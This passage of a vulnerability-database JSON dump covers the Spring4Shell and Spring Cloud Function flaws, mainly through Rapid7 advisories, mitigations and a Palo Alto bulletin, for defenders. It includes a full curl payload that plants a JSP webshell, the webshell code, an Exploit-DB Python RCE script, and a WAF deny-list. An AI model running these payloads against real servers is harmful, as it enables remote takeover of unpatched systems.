and quick for the Security teams to share relevant data with the Remediation team. It also gives remediators all of the information they need. We call this a win-win for both teams! [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Project search bar for Projects\n\nOur team has added a search bar on the Remediation Projects page. This highly requested feature empowers customers to easily locate a project instead of having to scroll down the entire list.\n\n\n\n_**Additional reading:**_\n\n * _[InsightVM Release Update: Let\u2019s Focus on Remediation for Just a Minute](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>)_\n * _[How to Build and Enable a Cyber Target Operating Model](<https://www.rapid7.com/blog/post/2022/07/08/how-to-build-and-enable-a-cyber-target-operating-model/>)_\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[Maximize Your VM Investment: Fix Vulnerabilities Faster With Automox + Rapid7](<https://www.rapid7.com/blog/post/2022/05/16/maximize-your-vm-investment-fix-vulnerabilities-faster-with-automox-rapid7/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-28T14:00:00", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-07-28T14:00:00", "id": "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "href": "https://blog.rapid7.com/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014, that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u200b\u200b\u2026there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 & 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim for organizations that have large deployments of the core Spring Framework or are in use for business critical applications we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere for organizations that have WAF technology, string filters offer an effective deterrent, "class._", "Class._", "_.class._", and "_.Class._". These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns. In this case any invocation containing \u201cclass\u201d. Praetorian example is provided below. The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{"class._", "Class._", "_.class._", "_.Class._"}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-28T03:34:13", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-11T00:00:00", "type": "exploitdb", "title": "Spring Cloud 3.2.2 - Remote Command Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-22963", "CVE-2022-22963"], "modified": "2023-07-11T00:00:00", "id": "EDB-ID:51577", "href": "https://www.exploit-db.com/exploits/51577", "sourceData": "# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)\r\n# Date: 07/07/2023\r\n# Exploit Author: GatoGamer1155, 0bfxgh0st\r\n# Vendor Homepage: https://spring.io/projects/spring-cloud-function/\r\n# Description: Exploit to execute commands exploiting CVE-2022-22963\r\n# Software Link: https://spring.io/projects/spring-cloud-function\r\n# CVE: CVE-2022-22963\r\n\r\nimport requests, argparse, json\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--url\", type=str, help=\"http://172.17.0.2:8080/functionRouter\", required=True)\r\nparser.add_argument(\"--command\", type=str, help=\"ping -c1 172.17.0.1\", required=True)\r\nargs = parser.parse_args()\r\n\r\nprint(\"\\n\\033[0;37m[\\033[0;33m!\\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\\n\")\r\n\r\nheaders = {\"spring.cloud.function.routing-expression\": 'T(java.lang.Runtime).getRuntime().exec(\"%s\")' % args.command }\r\ndata = {\"data\": \"\"}\r\n\r\nrequest = requests.post(args.url, data=data, headers=headers)\r\nresponse = json.dumps(json.loads(request.text), indent=2)\r\nprint(response)", "sourceHref": "https://www.exploit-db.com/raw/51577", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2023-07-21T18:40:25", "description": "The Palo Alto Networks Product Security Assurance team has completed its evaluation of the Spring Cloud Function vulnerability CVE-2022-22963 and Spring Core vulnerability CVE-2022-22965 for all products and services. All Palo Alto Networks cloud services with possible impact have been mitigated and remediated.\n\nThe following products and services are not impacted by these Spring vulnerabilities: AutoFocus, Bridgecrew, Cortex Data Lake, Cortex XDR agent, Cortex Xpanse, Cortex XSOAR, Enterprise Data Loss Prevention, Exact Data Matching (EDM) CLI, Expanse, Expedition Migration Tool, GlobalProtect app, IoT Security, Okyo Garde, Palo Alto Networks App for Splunk, PAN-OS hardware and virtual firewalls and Panorama appliances, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), Prisma SD-WAN ION, SaaS Security, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.\n\n**Work around:**\nNo workarounds or mitigations are required for Palo Alto Networks products at this time.\n\nCustomers with a Threat Prevention subscription can block the attack traffic related to these vulnerabilities by enabling Threat IDs 92393, 92394, and 83239 for CVE-2022-22965 and Threat ID 92389 for CVE-2022-22963.\n\nSee https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/ for more details on Palo Alto Networks product capabilities to protect against attacks that exploit this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:30:00", "type": "paloalto", "title": "Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 